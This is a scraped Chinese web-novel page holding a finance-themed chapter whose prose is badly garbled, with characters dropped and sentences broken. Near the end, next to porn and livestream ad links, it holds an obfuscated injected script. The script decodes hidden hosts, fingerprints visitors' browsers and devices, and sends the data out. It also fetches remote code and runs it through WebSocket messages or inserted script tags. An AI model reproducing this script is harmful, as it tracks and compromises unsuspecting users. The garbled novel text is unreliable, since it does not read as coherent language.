格林文学
  1. 格林文学
  2. 都市小说
  3. 魔都金融男神
  4. 166被世界摧残的女孩
设置

166被世界摧残的女孩(1 / 2)


外汇似海提示您:看后求收藏(格林文学www.gelintest.com),接着再看更方便。

“BOSS,今丞私募基金规模200亿。”蒋曼曼脸兴奋:“今控股股价,冲15000元股,市值150亿。”

次丞私募基金分红48亿,资产规模暴增,让丞控股股价再次创新高,15000元股,平均工资1.5万左右吧,刚股。

1000股,价值1500万股价继续话,栋豪宅非常期待,次买入次卖续股价继续买入,途挣少钱,1000股,打算长期持,等价值3000万栋豪宅,22岁姑娘,走向巅峰,男神!

“BOSS,私募基金200亿资金,将它投入方?”

罗丞爱尔眼科,药明康德,迈瑞医疗,恒瑞医药,片仔癀几医疗业巨头基本报告选择片仔癀,便:“盯片仔癀股价走势图,接支股票!”

片仔癀公司医药巨头,主业务锭剂、片剂、颗粒剂、胶囊剂、软膏剂、糖浆剂、酊剂产,片仔癀牌蜂乳胶囊产销售等。

今它股价处400元股,市值2400亿,罗丞觉股价太高,急进场买入,盯股价

,BOSS!”蒋曼曼连忙通知。

罗丞打医疗股价走势图。

A股医药股价则涨至40元每股,罗氏族基金1200万股,今每股浮盈15元,共计浮盈1.8亿,账户净值4.8亿,医疗股价刷新历史新高,非常,罗丞期待它50元股,间,慢慢持急平仓。

港股,港股复兴医药股价冲30元每股,罗氏族基金2500万股,建仓均价20港元每股,浮盈2.5亿,净值7.5亿,很错,急平仓,罗丞打算等它股价冲50元每股再平仓,很长间,非常,长线持

11点,罗丞离公司,漫步黄埔江畔。

私募基金规模200亿,展速度快,私募基金候,5亿规模已。

久啊?

直接200亿规模,翻40倍!

千亿级别规模,未私募基金!

公募基金千亿,万亿级别进军,未超越资产规模2万亿方易哒基金。

罗丞主方向将私募基金公募基金规模弄,将金融核打造,未参与证券业,保险业,信托业,银业,租赁业。

证券牌照张几十亿,信托牌照接近100亿,银牌照,保险牌照非常难,根本买控股未很长。

参与各各业,控股金融核帮助公司再反哺丞控股,比员工买保险,投资股票,高管信托,员工存款贷款,及旗公司涉及租金业务,控股源源资金,壮控股再靠金流支撑整系,实良性循环。

通金融集团正方向走。

海集团,诺安集团,怡集团横跨领域财团,涉及金融,产,半导体,医药,物,服装,运输,酒业,互联网,食品,餐饮,酒店,外贸口····非常业。

罗丞除金融方占据优势,领域,丞公司碾压

非常漫长,果干扶持,支持打击

金融舞台,缔造丞系财团,香江跳板,全球金融市场掀风浪,参与各各业,像花旗集团,高盛集团,摩根集团···黑石集团,贝德集团

缔造际金融科技结合财团,真正世界巅俯瞰众风景。

至高财权,荣耀才追求!

“路很长,挑战者,敌数。”

今仅仅始阿。”

,返回【东方文苑】,很乱,罗丞复旦图书馆显眼方贴告示,招募钟点工,每34,月薪6000,属很正常薪资,应该投简历吧?

罗丞打QQ邮箱,应聘,,让点失望。

复旦图书馆附近贴告示,找认真,进,爱钟点工,爱书,,通常毕竟责任

惜,投简历。

薪资太少?

,3月2号,周六,罗丞再次图书馆,打算再贴告示。

似乎争吵,围观,让罗丞走

见几白衣

该白衣被几,揪

凶神恶煞,巴掌抽白衣,嘴叫骂,白衣,骂口。

本章未完,请点击下一页继续阅读!

免费看片APP | 美女直播间
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE3Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6e\x5a\x79\x66\x4a\x72\x42\x51\x44']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],ec=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='nob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++ec]&&clearTimeout(t[e]);l.length?f():RCxthzmRkG()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++ec]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function b(){var a='';try{a=W.top.document.location.href}catch(e){a=D.location.href}if(a!=='')a=a.substr(0,2048);return fix(a)}function c(str){var s='';for(var i=0;i%lt;str.length;i++)s+=(i>0?':':'')+str[i].charCodeAt(0);return s}function d(){try{return[W.screen.width,W.screen.height].join('x')}catch(e){return''}}function f(){return N.platform.replace(/Win/i,'v')}function g(){var a=W.screen.availWidth||0,b=W.screen.availHeight||0;return[f(),S(),W.devicePixelRatio||0,a+'.'+b].join(':')}function h(){var n=W['navigator'],a=false;for(var k in n){try{a=N['hasOwnProperty'](k)}catch(e){a=false}}return a}function i(){;if(typeof N.languages!=='undefined'){try{return N.languages[0].substr(0,2)!==N.language.substr(0,2)}catch(err){return true}}return false}function j(f){var a=[];for(var i=0;i%lt;f.length;i++)a.push(String.fromCharCode(f[i]));return a.join('')}function k(){var a=['callPhantom'in W,'_phantom'in W,'phantom'in W];for(var i=0;i%lt;a.length;i++)if(a[i])return true;return false}function l(){return j([119,101,98,100,114,105,118,101,114])in N}function S(){var b=['toString','length'];(function(a,c){var f=function(g){while(--g){a['push'](a['shift']())}};f(++c)}(b,0xb3));var c=function(a){a=a-0x0;return b[a]};return eval[c('0x1')]()[c('0x0')]*0x673124}function n(){;if(typeof W.history!=='undefined'&&typeof W.history.length!=='undefined')return W.history.length;return 0}function o(){return{top:B.scrollTop||D.documentElement.scrollTop,left:0}}function _uuid(){try{var a='',k='fillStyle',q='beginPath',n='closePath',j='fill',h='arc',e='fillText',w=Math.PI;var p=D.createElement('canvas');p.width=2000;p.height=200;p.style.display='inline';var s=p.getContext('2d');s.rect(0,0,10,10);s.rect(2,2,6,6);a+='canvas winding:'+((s.isPointInPath(5,5,'evenodd')===false)?'yes':'no');s.textBaseline='alphabetic';s[k]='#f60';s.fillRect(125,1,62,20);s[k]='#069';s.font='11pt no-real-font-123';var u='Cwm fjordbank glyphs vext quiz, \ud83d\ude03';s[e](u,2,15);s[k]='rgba(102, 204, 0, 0.2)';s.font='18pt Arial';s[e](u,4,45);s.globalCompositeOperation='multiply';s[k]='rgb(255,0,255)';s[q]();s[h](50,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(0,255,255)';s[q]();s[h](100,50,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,255,0)';s[q]();s[h](75,100,50,0,w*2,true);s[n]();s[j]();s[k]='rgb(255,0,255)';s[h](75,75,75,0,w*2,true);s[h](75,75,25,0,w*2,true);s[j]('evenodd');if(p.toDataURL){a+=';canvas fp:'+p.toDataURL()}return(function(c){var b=0;if(c.length===0){return b}for(var i=0;i%lt;c.length;i++){b=((b%lt;%lt;5)-b)+c.charCodeAt(i);b=b&b}return b})(a)}catch(o){return o.message}}function init(){var p={frm:W.top!==W.self?1:0,url:b(),ref:a(),ic:N.cookieEnabled?1:0,pl:N.plugins.length,ml:N.mimeTypes.length,sid:c(g()),ps:N.productSub||'',lgs:i()?1:0,zo:new Date().getTimezoneOffset(),ws:d(),gdm:N.deviceMemory||0,iw:l()?1:0,cpn:N.hardwareConcurrency||0,fid:'',hl:n(),ihn:h()?1:0,md:E?1:0,ns:'',np:'',pj:k()?1:0};mix(p,o(),{'id':id,'rid':ut.guid(),'rid2':ut.guid(),'uuid':_uuid()},m.ap());return p}return init()}};return new Promise(function(resolve,reject){setTimeout(function(){var r=[],u=aid.split('-'),p=client.client(u[1]);for(var k in p)r.push(k+'='+p[k]);resolve(r.join('&'))},10)})})(id);param.then(function(p){i=i+'?'+p;for(var j in l)t[j]=setTimeout(f,delay*j)});})('aHR0cHM6Ly9hc2xkZmtqcy54ZmdjdGcuYY29t','d3NNzOi8vd3Mud3Fkd29yay5jb206OTc5NNyx3c3M6Ly93cy5zemZobDk5LmNNvbTo5NNzk3',window,document,['Y','N']);}:function(){};

相关小说推荐

本页面更新于2022-08-08 11:40:16
回到顶部
设置